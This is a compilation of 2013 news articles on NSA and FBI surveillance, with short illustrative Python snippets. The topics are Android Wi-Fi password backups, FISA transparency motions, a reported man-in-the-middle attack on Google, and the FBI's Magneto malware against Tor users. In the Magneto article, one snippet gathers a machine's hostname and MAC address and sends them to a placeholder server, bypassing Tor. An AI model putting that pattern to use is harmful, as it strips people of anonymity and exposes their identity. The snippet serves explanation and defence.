The bad news is that, like any American company, Google can be compelled by agencies of the U.S. government to silently spill the beans.

When it comes to Wi-Fi, the NSA, CIA and FBI may not need hackers and cryptographers. They may not need to exploit WPS [6] or UPnP [7]. If Android devices are offering up your secrets, WPA2 encryption and a long random password offer no protection.

I doubt that Google wants to rat out their own customers. They may simply have no choice. What large public American company would? Just yesterday, Marissa Mayer, the CEO of Yahoo, said executives faced jail [8] if they revealed government secrets. Lavabit felt there was a choice, but it was a single person operation.

This is not to pick on Google exclusively. After all, Dropbox can read the files you store with them. So too, can Microsoft read files stored in SkyDrive. And, although the Washington Post reported back in April that Apple’s iMessage encryption foils law enforcement [9], cryptographer Matthew Green did a simple experiment that showed that Apple can read your iMessages [10].

In fact, Green's experiment is pretty much the same one that shows that Google can read Wi-Fi passwords. He describes it:

First, lose your iPhone. Now change your password using Apple's iForgot service ... Now go to an Apple store and shell out a fortune buying a new phone. If you can recover your recent iMessages onto a new iPhone -- as I was able to do in an Apple store this afternoon -- then Apple isn't protecting your iMessages with your password or with a device key. Too bad.

Similarly, a brand new Android device can connect to Wi-Fi hotspots it is seeing for the very first time.

Back in June 2011, writing for TechRepublic, Donovan Colbert described stumbling across this [11] on a new ASUS Eee PC Transformer tablet:

I purchased the machine late last night after work. I brought it home, set it up to charge overnight, and went to bed. This morning when I woke I put it in my bag and brought it to the office with me. I set up my Google account on the device, and then realized I had no network connection ... I pulled out my Virgin Mobile Mi-Fi 2200 personal hotspot and turned it on. I searched around Honeycomb looking for the control panel to select the hotspot and enter the encryption key. To my surprise, I found that the Eee Pad had already found the Virgin hotspot, and successfully attached to it ... As I looked further into this puzzling situation, I noticed that not only was my Virgin Hotspot discovered and attached, but a list of other hotspots ... were also listed in the Eee Pad's hotspot list. The only conclusion that one can draw from this is obvious - Google is storing not only a list of what hotspots you have visited, but any private encryption keys necessary to connect to those hotspots ...

Micah Lee [12], staff technologist at the EFF, CTO of the Freedom of the Press Foundation and the maintainer of HTTPS Everywhere [13], blogged about the same situation [14] back in July.

When you format an Android phone and set it up on first run, after you login to your Google account and restore your backup, it immediately connects to wifi using a saved password. There’s no sort of password hash that your Android phone could send your router to authenticate besides the password itself.

Google stores the passwords in a manner such that they can decrypt them, given only a Gmail address and password.
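
For context on why whatever Google restores must be password-equivalent: WPA2-Personal derives its pre-shared key directly from the passphrase and the network name, so anything sufficient to rejoin the network — the passphrase itself or the derived key — effectively is the password for that network. A minimal sketch of that standard derivation (the passphrase and SSID below are made up):

    import hashlib

    def wpa2_psk(passphrase: str, ssid: str) -> bytes:
        # IEEE 802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
        return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

    print(wpa2_psk("correct horse battery staple", "HomeNetwork").hex())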

Shortly after Lee's blog, Ars Technica picked up on this (see Does NSA know your Wi-Fi password? Android backups may give it to them [15]). A Google spokesperson responded to the Ars article with a prepared statement.

Our optional ‘Backup my data’ feature makes it easier to switch to a new Android device by using your Google Account and password to restore some of your previous settings. This helps you avoid the hassle of setting up a new device from scratch. At any point, you can disable this feature, which will cause data to be erased. This data is encrypted in transit, accessible only when the user has an authenticated connection to Google and stored at Google data centers, which have strong protections against digital and physical attacks.

Sean Gallagher, who wrote the Ars article, added "The spokesperson could not speak to how ... the data was secured at rest."

Lee responded [16] to this with:

... it’s great the backup/restore feature is optional. It’s great that if you turn it off Google will delete your data. It’s great that the data is encrypted in transit between the Android device and Google’s servers, so that eavesdroppers can’t pull your backup data off the wire. And it’s great that they have strong security, both digital and physical, at their data centers. However, Google’s statement doesn’t mention whether or not Google itself has access to the plaintext backup data (it does)... [The issue is] Not how easy it is for an attacker to get at this data, but how easy it is for an authorized Google employee to get at it as part of their job. This is important because if Google has access to this plaintext data, they can be compelled to give it to the US government.

Google danced around the issue of whether they can read the passwords because they don't want people like me writing blogs like this. Maybe this is why Apple, so often, says nothing.

Eventually Lee filed an official Android feature request [17], asking Google to offer backups that are stored in such a way that only the end user (you and I) can access the data. The request was filed about two months ago and has been ignored by Google.
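
What Lee asked for amounts to client-side encryption under a key only the user can reproduce. A minimal sketch of that idea — not how Android's backup actually works, just an illustration of the requested design, assuming a device passphrase that is never sent to the server and the third-party cryptography library:

    import base64, hashlib, os
    from cryptography.fernet import Fernet

    def encrypt_backup(settings: bytes, passphrase: str, salt: bytes) -> bytes:
        # The key is derived on the device from a secret only the user knows;
        # the server stores only ciphertext plus the salt and cannot decrypt it.
        key = hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, 200_000, 32)
        return Fernet(base64.urlsafe_b64encode(key)).encrypt(settings)

    salt = os.urandom(16)  # stored alongside the ciphertext
    blob = encrypt_backup(b'{"wifi": {"HomeNetwork": "hunter2"}}', "device-only passphrase", salt)
    print(len(blob), "bytes of ciphertext")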

I am not revealing anything new here. All this has been out in the public before. Below is a partial list of previous articles.

However, this story has, on the whole, flown under the radar. Most tech outlets didn't cover it (Ars Technica and The Register being exceptions) for reasons that escape me.
http://blogs.computerworld.com/andro...password-world





Google, Yahoo, Facebook Request NSL Transparency, Public Hearings from FISA Court
Michael Mimoso

Google, Yahoo and Facebook filed amended requests today with the U.S. Foreign Intelligence Surveillance Court (FISC) reiterating their desire to publish numbers on requests for user data related to national security. Google, meanwhile, went a step further asking for an open, public hearing with the court so that the issue could be publicly debated.

The U.S. government prohibits companies from disclosing the number of requests received for user data under a number of national security statutes. All three have published transparency reports that describe a range for the total number of requests received and the number of users associated with those requests, but specifics on requests related to national security are not allowed to be published.

Google was the first to make such a public request, when in June it filed a motion days after the first of Edward Snowden’s revelations about the NSA’s data collection practices under the Patriot Act and its PRISM program. Google cited media reports, pointing to articles in the Guardian UK newspaper and The Washington Post alleging that the NSA had “direct access” to Google data. Google immediately denied these claims and petitioned FISC and Attorney General Eric Holder for permission to publish national security data.

Citing legal precedent, Google said it wants public access to the proceedings, in addition to being able to publish the total number of compulsory national security-related requests and the number of users or accounts associated with those requests.

“A public argument would be consistent with this Court’s rules, which state that ‘a hearing in a non-adversarial matter must be ex parte and conducted within the Court’s secure facility,’ suggesting by negative implication that a hearing in an adversarial matter shall be open,” the motion says.

On Aug. 29, Director of National Intelligence James Clapper announced that the government would release an annual statement describing the total number of national security orders and the number of targets affected by those orders. Those numbers would include probable cause orders under the Foreign Intelligence Surveillance Act (FISA), in particular Section 702 of the Act, as well as FISA business records and National Security Letters.

Google said Clapper’s announcement did not translate into enough transparency for its users.

“It fails to inform [users] of the true extent of demands placed on Google by the government and in any event, such publication is not a replacement for Google’s right to speak truthfully about the process it receives,” today’s motion said.

Google maintains its position that allegations that the intelligence community has access to user data, with or without a warrant, are hurting its business.

“Google must respond to such claims with more than generalities,” the motion said. “Moreover, these are matters of significant weight and importance, and transparency is critical to advancing public debate in a thoughtful and democratic manner.”

Today’s amended motions from Google, Yahoo and Facebook came after negotiations between the companies and the government reached an impasse, Google said; the government ordered amended motions be filed by today.

Yahoo, which filed its first transparency report last week, made the same request of the FISA court and urged that the U.S. should lead the world in transparency with regard to respect of civil liberties and human rights.

“We believe that the U.S. Government’s important responsibility to protect public safety can be carried out without precluding Internet companies from sharing the number of national security requests they may receive,” Yahoo General Counsel Ron Bell wrote. “Ultimately, withholding such information breeds mistrust and suspicion—both of the United States and of companies that must comply with government legal directives.”

Facebook General Counsel Colin Stretch echoed Bell’s remarks.

“The actions and statements of the U.S. government have not adequately addressed the concerns of people around the world about whether their information is safe and secure with Internet companies,” he wrote. “We believe there is more information that the public deserves to know, and that would help foster an informed debate about whether government security programs adequately balance privacy interests when attempting to keep the public safe.”

Facebook published its first transparency report on Aug. 27.
http://threatpost.com/google-yahoo-f...a-court/102229





NSA Disguised Itself as Google to Spy, Say Reports

If a recently leaked document is any indication, the US National Security Agency -- or its UK counterpart -- appears to have put on a Google suit to gather intelligence.
Edward Moyer

Here's one of the latest tidbits on the NSA surveillance scandal (which seems to be generating nearly as many blog items as there are phone numbers in the spy agency's data banks).

Earlier this week, Techdirt picked up on a passing mention in a Brazilian news story and a Slate article to point out that the US National Security Agency had apparently impersonated Google on at least one occasion to gather data on people. (Mother Jones subsequently pointed out Techdirt's point-out.)

Brazilian site Fantastico obtained and published a document leaked by Edward Snowden, which diagrams how a "man in the middle attack" involving Google was apparently carried out.

A technique commonly used by hackers, a MITM attack involves using a fake security certificate to pose as a legitimate Web service, bypass browser security settings, and then intercept data that an unsuspecting person is sending to that service. Hackers could, for example, pose as a banking Web site and steal passwords.

The technique is particularly sly because the hackers then use the password to log in to the real banking site and then serve as a "man in the middle," receiving requests from the banking customer, passing them on to the bank site, and then returning requested info to the customer -- all the while collecting data for themselves, with neither the customer nor the bank realizing what's happening. Such attacks can be used against e-mail providers too.

It's not clear if the supposed attack in the Fantastico document was handled by the NSA or by its UK counterpart, the Government Communications Headquarters (GCHQ). The article by the Brazilian news agency says, "In this case, data is rerouted to the NSA central, and then relayed to its destination, without either end noticing."

"There have been rumors of the NSA and others using those kinds of MITM attacks," Mike Masnick writes on Techdirt, "but to have it confirmed that they're doing them against the likes of Google... is a big deal -- and something I would imagine does not make [Google] particularly happy."

Google provided a short statement to Mother Jones reporter Josh Harkinson in response to his questions on the matter: "As for recent reports that the US government has found ways to circumvent our security systems, we have no evidence of any such thing ever occurring. We provide our user data to governments only in accordance with the law." (The company is also trying to win the right to provide more transparency regarding government requests for data on Google users.)

CNET got a "no comment" from the NSA in response to our request for more information.

As TechDirt suggests, an MITM attack on the part of the NSA or GCHQ would hardly be a complete shock. The New York Times reported last week that the NSA has sidestepped common Net encryption methods in a number of ways, including hacking into the servers of private companies to steal encryption keys, collaborating with tech companies to build in back doors, and covertly introducing weaknesses into encryption standards.

It wouldn't be much of a stretch to obtain a fake security certificate to foil the Secure Sockets Layer (SSL) cryptographic protocol that's designed to verify the authenticity of Web sites and ensure secure Net communications.

Indeed, such attacks have been aimed at Google before, including in 2011, when a hacker broke into the systems of DigiNotar -- a Dutch company that issued Web security certificates -- and created more than 500 SSL certificates used to authenticate Web sites.
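
One standard defense against exactly this kind of certificate forgery is pinning: compare the certificate a server actually presents with a fingerprint obtained out of band, and treat any mismatch as suspect. A minimal sketch using only the Python standard library (the host is just an example):

    import hashlib, ssl

    def cert_sha256(host: str, port: int = 443) -> str:
        # Fetch the certificate the server presents and fingerprint it.
        pem = ssl.get_server_certificate((host, port))
        der = ssl.PEM_cert_to_DER_cert(pem)
        return hashlib.sha256(der).hexdigest()

    # A mismatch with a previously recorded ("pinned") value is a red flag
    # that something in the path is presenting a forged certificate.
    print(cert_sha256("www.google.com"))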

In any case, the purported NSA/GCHQ impersonation of Google inspired a rather clever graphic by Mother Jones, one that might even impress the rather clever Doodlers at Google.
http://news.cnet.com/8301-13578_3-57...y-say-reports/





Yahoo CEO Mayer: We Faced Jail if We Revealed NSA Surveillance Secrets

Mark Zuckerberg joins Mayer in hitting back at critics of tech companies, saying US government did 'bad job' of balancing people's privacy and duty to protect
Dominic Rushe


Marissa Mayer, the CEO of Yahoo, and Mark Zuckerberg of Facebook struck back on Wednesday at critics who have charged tech companies with doing too little to fight off NSA surveillance. Mayer said executives faced jail if they revealed government secrets.

Yahoo and Facebook, along with other tech firms, are pushing for the right to be allowed to publish the number of requests they receive from the spy agency. Companies are forbidden by law to disclose how much data they provide.

During an interview at the Techcrunch Disrupt conference in San Francisco, Mayer was asked why tech companies had not simply decided to tell the public more about what the US surveillance industry was up to. "Releasing classified information is treason and you are incarcerated," she said.

Mayer said she was "proud to be part of an organisation that from the beginning, in 2007, has been sceptical of – and has been scrutinizing – those requests [from the NSA]."

Yahoo has previously unsuccessfully sued the foreign intelligence surveillance (Fisa) court, which provides the legal framework for NSA surveillance. In 2007 it asked to be allowed to publish details of requests it receives from the spy agency. "When you lose and you don't comply, it's treason," said Mayer. "We think it makes more sense to work within the system," she said.

Zuckerberg said the government had done a "bad job" of balancing people's privacy and its duty to protect. "Frankly I think the government blew it," he said.

He said after the news broke in the Guardian and the Washington Post about Prism, the government surveillance programme that targets major internet companies: "The government response was, 'Oh don't worry we are not spying on any Americans.' Oh wonderful that's really helpful to companies that are trying to serve people around the world and that's really going to inspire confidence in American internet companies."

"I thought that was really bad," he said. Zuckerberg said Facebook and others were pushing successfully for more transparency. "We are not at the end of this. I wish that the government would be more proactive about communicating. We are not psyched that we had to sue in order to get this and we take it very seriously," he said.

On Monday, executives from Yahoo, Facebook, Google and other tech leaders met the president's group on intelligence and communications, tasked with reviewing the US's intelligence and communications technologies in the wake of the NSA revelations.

The meeting came as Yahoo and Facebook filed suits once more to force the Fisa court to allow them to disclose more information.

In its motion, Yahoo said: "Yahoo has been unable to engage fully in the debate about whether the government has properly used its powers, because the government has placed a prior restraint on Yahoo's speech."

It went on: "Yahoo's inability to respond to news reports has harmed its reputation and has undermined its business not only in the United States but worldwide. Yahoo cannot respond to such reports with mere generalities," the company said.

Microsoft and Google also filed their latest legal briefs on Monday to force the Fisa court to disclose more information.

In a blogpost, Google said it was asking for permission to publish "detailed statistics about the types (if any) of national security requests" it receives under Fisa.

"Given the important public policy issues at stake, we have also asked the court to hold its hearing in open rather than behind closed doors. It's time for more transparency," said Google.
http://www.theguardian.com/technolog...a-surveillance





Senator Asks Cellphone Carriers: What Exactly Do You Share With Government?
Somini Sengupta

Senator Edward J. Markey of Massachusetts sent a letter to eight of the country’s major cell phone carriers asking for details on data requests they received from government agencies.

Last year, Edward J. Markey, then a member of the House of Representatives, asked the country’s major cellphone carriers to disclose how many data requests they received from federal and local law enforcement agencies. More than one million in 2011 alone, they said, revealing for the first time how ubiquitous cellphone records had become in criminal investigations.

Now a member of the Senate, Mr. Markey is asking for this year’s numbers, with more details. What exactly does the government seek from the carriers, he wants to know. How often do agencies ask for cellphone tower dumps, location data, the content of text messages, browsing history and so on? How many of those requests did the companies comply with, how many did they deny, and why?

The letter to eight companies, including the largest carriers, AT&T, T-Mobile, and Verizon, was sent Thursday. It comes against the backdrop of mounting revelations about secret surveillance of Americans’ communications.

Senator Markey’s original request last year documented the fast-growing business of cellphone surveillance. Law enforcement sought a variety of records of cellphone subscribers in the course of routine street crime investigations, emergencies and counter-terrorism operations.

At the time, carriers said they generally required a search warrant or court order before complying with a law enforcement agency’s request for data. But on certain categories of information, like location data, the law remains vague on whether a search warrant is required.

This time around, in his letter, Senator Markey also sought to know how many times federal officials invoked Sec. 215 of the Patriot Act, which carries a gag order prohibiting recipients from discussing its details.
http://bits.blogs.nytimes.com/2013/0...th-government/





Judge Urges U.S. to Consider Releasing N.S.A. Data on Calls
Scott Shane

A judge on the nation’s intelligence court directed the government on Friday to review for possible public release the court’s classified opinions on the National Security Agency’s practice of collecting logs of Americans’ phone calls.

Judge F. Dennis Saylor IV issued the opinion in response to a motion filed by the American Civil Liberties Union, saying such a move would add to “an informed debate” about privacy and might even improve the reputation of the Foreign Intelligence Surveillance Court on which he sits.

The ruling was the latest development to show the seismic impact of the disclosures by Edward J. Snowden, the former N.S.A. contractor, on the secrecy that has surrounded both the agency and the court. It came a day after the director of national intelligence, James R. Clapper Jr., said in a speech that Mr. Snowden’s leak of secret documents had set off a “needed” debate.

Judge Saylor of Boston, one of the 11 federal judges who take turns sitting on the court operated under the Foreign Intelligence Surveillance Act, said in his ruling that the publication in June of a court order leaked by Mr. Snowden regarding the phone logs had prompted the government to release a series of related documents and “engendered considerable public interest and debate.”

Among the documents voluntarily made public by the Obama administration since then are two FISA court rulings from 2009 and 2011 that were highly critical of the N.S.A., which the judges said had not only violated the agency’s own rules and the law, but had repeatedly misled them.

Those disclosures ran counter to a longstanding assertion by the court’s critics that it acts as a rubber stamp for the N.S.A. and the F.B.I., since statistics show that it has rarely turned down a request for a government eavesdropping warrant.

Judge Saylor seemed to applaud the fuller picture of the court’s actions from the disclosures to date, saying of the possibility of the release of more declassified rulings that “publication would also assure citizens of the integrity of this court’s proceedings.”

The court was responding to the A.C.L.U.’s request for public release of rulings related to the N.S.A.’s collection of the so-called metadata of virtually all phone calls in the United States — phone numbers, time and duration of calls, but not their content. The collection takes place under a provision of the Patriot Act that allows the government to gather “business records” if they are relevant to a terrorism or foreign intelligence investigation.

Though the intelligence court has continued to approve orders to the telephone companies to turn over the call logs, members of Congress — including Representative Jim Sensenbrenner of Wisconsin, a Republican and an author of the Patriot Act, and Senator Patrick J. Leahy of Vermont, the Democratic chairman of the Judiciary Committee — have said the N.S.A.’s collection goes too far.

Alex Abdo, a staff lawyer with the A.C.L.U.’s national security project, said the ruling showed that the court “has recognized the importance of transparency to the ongoing public debate about the N.S.A.’s spying.” Mr. Abdo added, “For too long, the N.S.A.’s sweeping surveillance of Americans has been shrouded in unjustified secrecy.”

Before Mr. Snowden began his release of documents in June, intelligence officials insisted that any public discussion of N.S.A. programs or the secret court rulings governing them would pose a danger to national security. But the strong public and Congressional response to many of the disclosures has forced the spy agency to shift its stance, and President Obama has directed it to make public as much as possible about its operations and rules.

In response, Mr. Clapper’s office has created a new Web page to make public documents, statements by officials and other explanatory material.

On Thursday, in a talk to intelligence contractors, Mr. Clapper said he thought Mr. Snowden’s leaks had started a valuable discussion. “It’s clear that some of the conversations this has generated, some of the debate, actually needed to happen,” he said, according to The Los Angeles Times. “If there’s a good side to this, maybe that’s it.”

But he denounced Mr. Snowden’s leaks, saying they had damaged national security. “Unfortunately, there is more to come,” he said, referring to the fact that news reports have covered only a small fraction of the tens of thousands of documents Mr. Snowden took.
http://www.nytimes.com/2013/09/14/us...-on-calls.html





FBI Admits It Controlled Tor Servers Behind Mass Malware Attack
Kevin Poulsen

It wasn’t ever seriously in doubt, but the FBI yesterday acknowledged that it secretly took control of Freedom Hosting last July, days before the servers of the largest provider of ultra-anonymous hosting were found to be serving custom malware designed to identify visitors.

Freedom Hosting’s operator, Eric Eoin Marques, had rented the servers from an unnamed commercial hosting provider in France, and paid for them from a bank account in Las Vegas. It’s not clear how the FBI took over the servers in late July, but the bureau was temporarily thwarted when Marques somehow regained access and changed the passwords, briefly locking out the FBI until it regained control.

The new details emerged in local press reports from a Thursday bail hearing in Dublin, Ireland, where Marques, 28, is fighting extradition to America on charges that Freedom Hosting facilitated child pornography on a massive scale. He was denied bail today for the second time since his arrest in July.

Freedom Hosting was a provider of turnkey “Tor hidden service” sites — special sites, with addresses ending in .onion, that hide their geographic location behind layers of routing, and can be reached only over the Tor anonymity network. Tor hidden services are used by sites that need to evade surveillance or protect users’ privacy to an extraordinary degree – including human rights groups and journalists. But they also appeal to serious criminal elements, child-pornography traders among them.

On August 4, all the sites hosted by Freedom Hosting — some with no connection to child porn — began serving an error message with hidden code embedded in the page. Security researchers dissected the code and found it exploited a security hole in Firefox to identify users of the Tor Browser Bundle, reporting back to a mysterious server in Northern Virginia. The FBI was the obvious suspect, but declined to comment on the incident. The FBI also didn’t respond to inquiries from WIRED today.

But FBI Supervisory Special Agent Brooke Donahue was more forthcoming when he appeared in the Irish court yesterday to bolster the case for keeping Marques behind bars, according to local press reports. Among the many arguments Donahue and an Irish police inspector offered was that Marques might reestablish contact with co-conspirators, and further complicate the FBI probe. In addition to the wrestling match over Freedom Hosting’s servers, Marques allegedly dove for his laptop when the police raided him, in an effort to shut it down.

Donahue also said Marques had been researching the possibility of moving his hosting, and his residence, to Russia. “My suspicion is he was trying to look for a place to reside to make it the most difficult to be extradited to the U.S.,” said Donahue, according to the Irish Independent.

Freedom Hosting has long been notorious for allowing child porn to live on its servers. In 2011, the hacktivist collective Anonymous singled out the service for denial-of-service attacks after allegedly finding the firm hosted 95 percent of the child porn hidden services on the Tor network. In the hearing yesterday, Donahue said the service hosted at least 100 child porn sites with thousands of users, and claimed Marques had visited some of the sites himself.

Reached by phone, Marques’ lawyer declined to comment on the case. Marques faces federal charges in Maryland, where the FBI’s child-exploitation unit is based, in a case that is still under seal.

The apparent FBI-malware attack was first noticed on August 4, when all of the hidden service sites hosted by Freedom Hosting began displaying a “Down for Maintenance” message. That included at least some lawful websites, such as the secure email provider TorMail.

Some visitors looking at the source code of the maintenance page realized that it included a hidden iframe tag that loaded a mysterious clump of Javascript code from a Verizon Business internet address. By midday, the code was being circulated and dissected all over the net. Mozilla confirmed the code exploited a critical memory management vulnerability in Firefox that was publicly reported on June 25, and is fixed in the latest version of the browser.
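
For readers wondering how that inspection works: the hidden iframe is an ordinary HTML tag, typically shrunk to zero pixels or styled invisible, whose src attribute pulls in script from the attacker's address. The snippet below is a minimal Python sketch of that kind of inspection, not the researchers' actual tooling; it scans a saved copy of a page (the file name is hypothetical) for iframe tags and prints where they point, using only the standard library.

[code]
# Minimal sketch: scan a saved HTML page for iframe tags and show where
# their "src" attributes point. Illustration only; the file name is made up.
from html.parser import HTMLParser

class IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # Keep every attribute so size/style tricks (height="0",
            # style="display:none") used to hide the frame are visible too.
            self.iframes.append(dict(attrs))

finder = IframeFinder()
with open("maintenance_page.html", encoding="utf-8", errors="replace") as f:
    finder.feed(f.read())

for frame in finder.iframes:
    print("iframe loads:", frame.get("src"), "attributes:", frame)
[/code]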

Though many older revisions of Firefox were vulnerable to that bug, the malware only targeted Firefox 17 ESR, the version of Firefox that forms the basis of the Tor Browser Bundle – the easiest, most user-friendly package for using the Tor anonymity network. That made it clear early on that the attack was focused specifically on de-anonymizing Tor users.

Tor Browser Bundle users who installed or manually updated after June 26 were safe from the exploit, according to the Tor Project’s security advisory on the hack.

Perhaps the strongest evidence that the attack was a law enforcement or intelligence operation was the limited functionality of the malware.

The heart of the malicious Javascript was a tiny Windows executable hidden in a variable named “Magneto.” A traditional virus would use that executable to download and install a full-featured backdoor, so the hacker could come in later and steal passwords, enlist the computer in a DDoS botnet, and generally do all the other nasty things that happen to a hacked Windows box.

But the Magneto code didn’t download anything. It looked up the victim’s MAC address — a unique hardware identifier for the computer’s network or Wi-Fi card — and the victim’s Windows hostname. Then it sent them to a server in Northern Virginia, bypassing Tor, to expose the user’s real IP address, coding the transmission as a standard HTTP web request.
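
To make that description concrete, here is a rough Python sketch of the kind of identifying data the article says the payload gathered and sent back: the MAC address, the Windows hostname and (as noted below) a per-visit serial number, transmitted as an ordinary HTTP request that never touches Tor. This is an illustration only, not the actual Windows-native Magneto code; the collection address and serial value are placeholders.

[code]
# Illustration of the reported phone-home behavior, not the real payload.
# The collection URL and serial number below are placeholders.
import socket
import urllib.parse
import urllib.request
import uuid

hostname = socket.gethostname()          # the machine's hostname
mac = format(uuid.getnode(), "012x")     # MAC address of a network interface
serial = "0123456789abcdef"              # placeholder per-visit identifier

params = urllib.parse.urlencode({"host": hostname, "mac": mac, "serial": serial})
url = "http://collection.example.invalid/report?" + params

# Sending this directly over HTTP, rather than through the Tor SOCKS proxy,
# is what exposes the machine's real IP address to the collection server.
try:
    urllib.request.urlopen(url, timeout=5)
except OSError:
    pass  # the placeholder server does not exist
[/code]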

“The attackers spent a reasonable amount of time writing a reliable exploit, and a fairly customized payload, and it doesn’t allow them to download a backdoor or conduct any secondary activity,” said Vlad Tsyrklevich, who reverse-engineered the Magneto code, at the time.

The malware also sent a serial number that likely ties the target to his or her visit to the hacked Freedom Hosting-hosted website.

The official IP allocation records maintained by the American Registry for Internet Numbers show the two Magneto-related IP addresses were part of a ghost block of eight addresses that have no organization listed. Those addresses trace no further than the Verizon Business data center in Ashburn, Virginia, 20 miles northwest of the Capital Beltway.

The code’s behavior, and the command-and-control server’s Virginia placement, is also consistent with what’s known about the FBI’s “computer and internet protocol address verifier,” or CIPAV, the law enforcement spyware first reported by WIRED in 2007.

Court documents and FBI files released under the FOIA have described the CIPAV as software the FBI can deliver through a browser exploit to gather information from the target’s machine and send it to an FBI server in Virginia. The FBI has been using the CIPAV since 2002 against hackers, online sexual predators, extortionists, and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor.

Prior to the Freedom Hosting attack, the code had been used sparingly, which kept it from leaking out and being analyzed.

No date has been set for Marques’ extradition hearings, but it’s not expected to happen until next year.
http://www.wired.com/threatlevel/201...m-hosting-fbi/





Internet Experts Want Security Revamp After NSA Revelations
Joseph Menn

Internet security experts are calling for a campaign to rewrite Web security in the wake of disclosures that the U.S. National Security Agency has developed the capability to break encryption protecting millions of sites.

But they acknowledged the task won't be easy, in part because internet security has relied heavily on brilliant government scientists who now appear suspect to many.

Leading technologists said they felt betrayed that the NSA, which has contributed to some important security standards, was trying to ensure they stayed weak enough that the agency could break them. Some said they were stunned that the government would value its monitoring ability so much that it was willing to reduce everyone's security.

"We had the assumption that they could use their capacity to make weak standards, but that would make everyone in the U.S. insecure," said Johns Hopkins cryptography professor Matthew Green. "We thought they would never be crazy enough to shoot out the ground they were standing on, and now we're not so sure."

The head of the volunteer group in charge of the Internet's fundamental technology rules told Reuters on Saturday that the panel will intensify its work to add encryption to basic Web traffic and to strengthen the so-called secure sockets layer, which guards banking, email and other pages beginning with Https.
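
For context, the "secure sockets layer" the task force wants to strengthen is the encryption handshake an https:// connection performs before any page data moves. A minimal Python sketch of that layer, using only the standard library, looks something like the following; the host name is just an example.

[code]
# Open a TLS-protected connection to an https site and show which protocol
# version and cipher suite are guarding the session. Standard library only.
import socket
import ssl

host = "www.example.com"                   # any https-enabled site
context = ssl.create_default_context()     # verifies the server's certificate

with socket.create_connection((host, 443), timeout=10) as sock:
    with context.wrap_socket(sock, server_hostname=host) as tls:
        print("protocol:", tls.version())  # e.g. TLSv1.2
        print("cipher:", tls.cipher())     # negotiated cipher suite
        print("issuer:", tls.getpeercert().get("issuer"))
[/code]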

"This is one instance of the dangers that we face in the networked age," said Jari Arkko, an Ericsson scientist who chairs the Internet Engineering Task Force. "We have to respond to the new threats."

Other experts likewise responded sharply to media reports based on documents from former NSA contractor Edward Snowden showing the NSA has manipulated standards.

Documents provided to The Guardian, the New York Times and others by Snowden and published on Thursday show that the agency worked to insert vulnerabilities in commercial encryption gear, covertly influence other designs to allow for future entry, and weaken industry-wide standards to the agency's benefit.

In combination with other techniques, those efforts led the NSA to claim internally that it had the ability to access many forms of internet traffic that had been widely believed to be secure, including at least some virtual private networks, which set up secure tunnels on the Internet, and the secure sockets layer used across the Web for online banking and the like.

The office of the Director of National Intelligence said Friday that the NSA "would not be doing its job" if it did not try to counter the use of encryption by such adversaries as "terrorists, cybercriminals, human traffickers and others."

Green and others said a great number of security protocols needed to be written "from scratch" without government help.

Vint Cerf, author of some of the core internet protocols, said that he didn't know whether the NSA had truly wreaked much damage, underscoring the uncertainty in the new reports about what use the NSA has made of its abilities.

"There has long been a tension between the mission to conduct surveillance and the mission to protect communication, and that tension resolved some time ago in favor of protection at least for American communications," Cerf said.

Yet Cerf's employer Google Inc confirmed it is racing to encrypt data flowing between its data centers, a process that was ramped up after Snowden's documents began coming to light in June.

Author Bruce Schneier, one of the most admired figures in modern cryptography, wrote in a Guardian column that the NSA "has undermined a fundamental social contract" and that engineers elsewhere had a "moral duty" to take back the Internet.

RELYING ON NSA FOR HELP

But all those interviewed warned that rewriting Web security would be extremely difficult.

Mike Belshe, a former Google engineer who has spearheaded the IETF drive to encrypt regular Web traffic, said that his plan had been "watered down" in the committee process during the past few years as some companies looked after their own interests more than users.

Another problem is the relatively small number of mathematical experts working outside the NSA.

"A lot of our foundational technologies for securing the Net have come through the government," said researcher Dan Kaminsky, famed for finding a critical flaw in the way users are steered to the website they seek. "They have the best minds in the country, but their advice is now suspect."

Finally, governments around the world, including democracies, are asserting more authority over the Internet, in some cases forbidding the use of virtual private networks.

"As much as I want to say this is a technology problem we can address, if the nation states decide security isn't something we're allowed to have, then we're in trouble," Kaminsky said. "If security is outlawed, only outlaws will have security."

(Editing by Peter Henderson and Eric Walsh)
http://www.reuters.com/article/2013/...98701J20130908





Gov’t Standards Agency “Strongly” Discourages Use of NSA-Influenced Algorithm

NIST: "we are not deliberately... working to undermine or weaken encryption."
Jeff Larson and Justin Elliott

Following revelations about the National Security Agency's (NSA) covert influence on computer security standards, the National Institute of Standards and Technology, or NIST, announced earlier this week it is revisiting some of its encryption standards. But in a little-noticed footnote, NIST went a step further, saying it is "strongly" recommending against even using one of the standards.

The institute sets standards for everything from timekeeping to weights and measures to computer security that are used by the government and widely adopted by industry.

As ProPublica, The New York Times, and The Guardian reported last week, documents provided by Edward Snowden suggest that the NSA has heavily influenced the standard, which has been used around the world. In its statement Tuesday, the NIST acknowledged that the NSA participates in creating cryptography standards "because of its recognized expertise" and because the NIST is required by law to consult with the spy agency. "We are not deliberately, knowingly, working to undermine or weaken encryption," NIST chief Patrick Gallagher said at a public conference Tuesday.

Various versions of Microsoft Windows, including those used in tablets and smartphones, contain implementations of the standard, though the NSA-influenced portion isn't enabled by default. Developers creating applications for the platform must choose to enable it.

The New York Times noted earlier this week that documents provided by Snowden show the spy agency played a crucial role in writing the standard that the NIST is now cautioning against using, which was first published in 2006. The NIST standard describes what is known as an "elliptic curve-based deterministic random bit generator." This bit of computer code is one way to produce random numbers that are the cornerstone of encryption technology used on the Internet. If the numbers generated are not random but in fact predictable, the encryption can be more easily cracked.
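
Why predictability matters is easy to demonstrate. The toy Python example below is not a model of the NIST generator itself; it simply shows that when the "random" keystream protecting a message comes from a generator whose seed an attacker can guess, the attacker can regenerate the keystream and read the message.

[code]
# Toy demonstration: a guessable seed makes the "random" keystream, and
# therefore the encrypted message, recoverable. Not the NIST algorithm.
import random
import time

def keystream(seed, n):
    rng = random.Random(seed)                     # non-cryptographic generator
    return bytes(rng.randrange(256) for _ in range(n))

message = b"transfer $1000 to account 42"
seed = int(time.time())                           # "random" but easy to guess
cipher = bytes(m ^ k for m, k in zip(message, keystream(seed, len(message))))

# An attacker tries nearby timestamps until the plaintext looks sensible.
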